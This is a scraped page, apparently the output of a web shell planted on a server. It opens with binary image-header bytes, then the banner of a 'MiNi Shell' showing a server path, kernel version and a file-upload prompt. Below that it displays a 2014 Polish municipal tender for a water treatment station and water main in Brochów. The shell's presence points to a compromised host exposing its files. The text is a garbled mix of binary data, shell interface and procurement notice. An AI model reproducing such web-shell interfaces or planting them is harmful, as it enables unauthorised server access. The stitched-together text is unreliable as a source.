JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140710/231470-N-2014.html

<p class="kh_header"><b>Brochów: Budowa Stacji Uzdatniania wody w miejscowości  Konary  oraz  sieci   wodociągowej  w miejscowości  Janów  gmina Brochów</b><br>
<b>Numer ogłoszenia: 231470 - 2014; data zamieszczenia: 10.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brochów , Brochów 125, 05-088 Brochów, woj. mazowieckie, tel. 22 7257051, faks 22 7257051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brochow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Stacji Uzdatniania wody w miejscowości  Konary  oraz  sieci   wodociągowej  w miejscowości  Janów  gmina Brochów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Budowa Stacji Uzdatniania wody w miejscowości  Konary.     
    Planowane do wykonania roboty polegać będą  na budowie :
     budynku technologicznego  o powierzchni zabudowy    230,84 m2,
     żelbetowego zbiornika   wody uzdatnionej  o powierzchni zabudowy  89,87 m2,
     żelbetowego zbiornika   na wody popłuczne  o powierzchni zabudowy  54,56 m2,
     zbiornika retencyjno-rozsączającego,
     wewnętrznych oraz zewnętrznych instalacji elektrycznych,
     wewnętrznych oraz zewnętrznych  instalacji kanalizacji sanitarnej,
     wewnętrznych oraz zewnętrznych  instalacji  wodociągowych, 
     ciągu  pieszo-jezdnego  z kostki betonowej, 
     miejsc parkingowych  na samochód osobowy i ciężarowy,
     ogrodzenia z bramą  wjazdową i brama wewnętrzną ,
     przyłącza kanalizacji sanitarnej, 
     przyłącza  energetycznego i  napowietrznej stacji  SN/nN,
     budowie zjazdu do drogi powiatowej,
     budowie  nowych 2  studni głębinowych
 2) Budowa sieci   wodociągowej  w miejscowości  Janów  o długości  1012,0 mb z rur PVC średnicy  
     110 mm
3) Uzyskanie  prawomocnej decyzji pozwolenia na użytkowanie 
Szczegółowy zakres  przedmiotu zamówienia  z wyszczególnieniem  pozycji tworzących zamówienie 
    oraz wymagania  zamawiającego dotyczące  parametrów technicznych  określa dokumentacja  
    projektowa  załączona do siwz, przedmiary robót  oraz specyfikacja  techniczna 
    wykonania i odbioru  robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.25.20.00-8, 45.23.14.00-9, 45.31.00.00-3, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 70000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli  wykonawca złoży  Oświadczenie   z art. 22 ust.1  -</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli  wykonawca  wykaże, że w okresie  ostatnich  pięciu lat 
      przed upływem  terminu składania  ofert, a jeżeli okres  prowadzenia działalności jest krótszy   
     w tym okresie  wykonał  co najmniej dwie inwestycje polegające na budowie lub  rozbudowie 
     stacji uzdatniania wody o wartości  łącznej  nie  mniejszej  niż    1 500 000 zł brutto. 
            Do wskazanych robót wykonawca zobowiązany jest  przedstawić dokumenty potwierdzające , 
            czy  roboty te zostały  wykonane w sposób  należyty oraz wskazujących  czy zostały wykonane  
            zgodnie z zasadami  sztuki budowlanej  i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli  wykonawca złoży  Oświadczenie   z art. 22 ust.1  -</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony  jeżeli  Wykonawca wykaże, że dysponuje osobami:
  a)kierownik budowy posiadający  uprawnienia do kierowania robotami  budowlanymi  w  
     specjalności  konstrukcyjno-  budowlanej,
           b) kierownik  robót  sanitarnych - posiadający uprawnienia do kierowania robotami  budowlanymi   w 
               zakresie  instalacji   sanitarnych,   
 c) kierownik robót elektrycznych  - posiadający uprawnienia do kierowania robotami  
    budowlanymi  w zakresie  sieci,  instalacji    i  urządzeń   elektrycznych i elektroenergetycznych .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli  wykonawca wykaże, że :
           a) posiada   środki finansowe lub   zdolność kredytową  w wysokości   co najmniej 1 500 000 zł  
           b)posiada opłaconą polisę, a w przypadku  jej braku, inny  dokument  potwierdzający, że wykonawca 
           jest ubezpieczony  od odpowiedzialności    cywilnej  w zakresie   prowadzonej działalności związanej z 
           przedmiotem zamówienia   w wysokości conajmniej  2000000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania  oferty w przypadku, gdy Wykonawcę  reprezentuje  Pełnomocnik.
    Do oferty należy dołączyć  dokument pełnomocnictwa w formie oryginału lub kopii poświadczonej 
    przez notariusza.
Formularz ofertowy. 
Dowód wniesienia wadium.Oświadczenie o podwykonawstwie.
Kosztorys ofertowy  uproszczony.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:  

1. Zmiana Czasu na Ukończenie Robót   
    1) Zmiany spowodowane warunkami atmosferycznymi w szczególności:
         a) klęski żywiołowe;
         b) warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót 
             budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
    2) Zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub 
         terenowymi, w szczególności:
         a) niewypały i niewybuchy;
         b) wykopaliska archeologiczne;
         c) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
         d) odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie   
             niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych, wystąpienie wód 
             gruntowych o ile nie przewidywała ich wystąpienia dokumentacja techniczna itp.
    3)  Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
         a) zmiana terminu wykonania umowy w przypadku nie wprowadzenia Wykonawcy na teren budowy w 
              umownym terminie  
         b) wstrzymanie robót przez Zamawiającego;
         c) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji 
             technicznej wykonania i odbioru robót; 
    4) Zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach 
         zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli 
         gruntów pod inwestycję, w szczególności:
         a) przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w 
             danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, 
             zezwoleń, uzgodnień itp.;
         b) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, 
              uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa udostępnienia przez 
              właścicieli nieruchomości do celów realizacji inwestycji;
     5) Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy  skutkujące niemożliwością 
         prowadzenia prac lub wykonywania innych czynności przewidzianych Kontraktem;

      W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ppkt 1) - 5) termin Czasu   
      Ukończenia Robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia   
      wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  

   2. Zmiana sposobu spełnienia świadczenia
     1)  Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:
           a) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub     
               specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub 
               wycofaniem z rynku tych materiałów lub urządzeń;
           b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na 
                zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego 
                przedmiotu umowy, lub umożliwiające uzyskanie lepszej, jakości Robót.
           c) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na 
               zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów 
               eksploatacji wykonanego przedmiotu umowy;
           d) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań        technicznych/ 
                technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania 
                i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem 
                lub wadliwym wykonaniem przedmiotu umowy,
          e) zlecenie robót dodatkowych oraz koniecznych do wykonania a wynikłych po odkryciu i ocenie stanu 
               technicznego urządzeń infrastruktury technicznej ,
           f) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i 
               odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy 
               przy dotychczasowych założeniach technologicznych;
           g) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i 
               odbioru robót warunki terenowe, w szczególności istnienie zinwentaryzowanych lub błędnie 
               zinwentaryzowanych obiektów budowlanych;
           h) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych 
                lub materiałowych ze względu na zmiany obowiązującego prawa, lub okoliczności gospodarczych, 
            i) konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia 
                sprzeczności przy pomocy wykładni, w szczególności, gdy sprzeczne zapisy mają równy stopień 
                pierwszeństwa 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 2.1) możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń. Zamawiający przewiduje w takiej sytuacji zmianę wynagrodzenia odpowiednio do zmian zaistniałych w trakcie realizacji zamówienia. Rozliczenie robót nastąpi wtedy metodą powykonawczą z zastosowaniem stawek przyjętych do wyceny robót w ofercie wykonawcy.
 
    2)   Zmiany osobowe
          a) zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające 
              warunki określone w specyfikacji istotnych warunków zamówienia, według polityki kadrowej 
              Wykonawcy
          b) Zmiana osób podanych w ofercie wykonawcy przy pomocy, których Wykonawca realizuje przedmiot 
              umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi SIWZ , a 
              dla dokonania zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę.

 3.  Pozostałe zmiany spowodowane następującymi okolicznościami:
          1) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
          2) zmiana obowiązującej stawki VAT;  
          3) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy,
          4) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. 
          5) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. 
W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji.
           6) zmiany uzasadnione okolicznościami, o których mowa w art. 357 §1 Kodeksu cywilnego. 
          7) gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością 
               wykonania lub należytego wykonania umowy zgodnie z SIWZ.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 3  ppkt 1),4),  5), 6),7) możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń.
W przypadku pkt. 3.2) zmiana stawki VAT dotyczyć będzie ceny oferty, w części, jakiej dotyczą te zmiany przepisów.
W przypadku pkt. 3.3) zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionych w umowie.
W przypadku pkt. 3.4 zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie Robót, z których Zamawiający rezygnuje.
Wszystkie powyższe postanowienia w punktach 1, 2 i 3  stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie rodzą żadnego roszczenia w stosunku do Zamawiającego. 

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego) 
b) zmiany danych teleadresowych, 
c) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych 
d) udzielenie zamówień uzupełniających w zakresie wskazanym w SIWZ
tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brochow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Brochów, Brochów 125,  05-088 Brochów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 11:00, miejsce: Urząd Gminy Brochów, Brochów 125,  05-088 Brochów
pokój nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




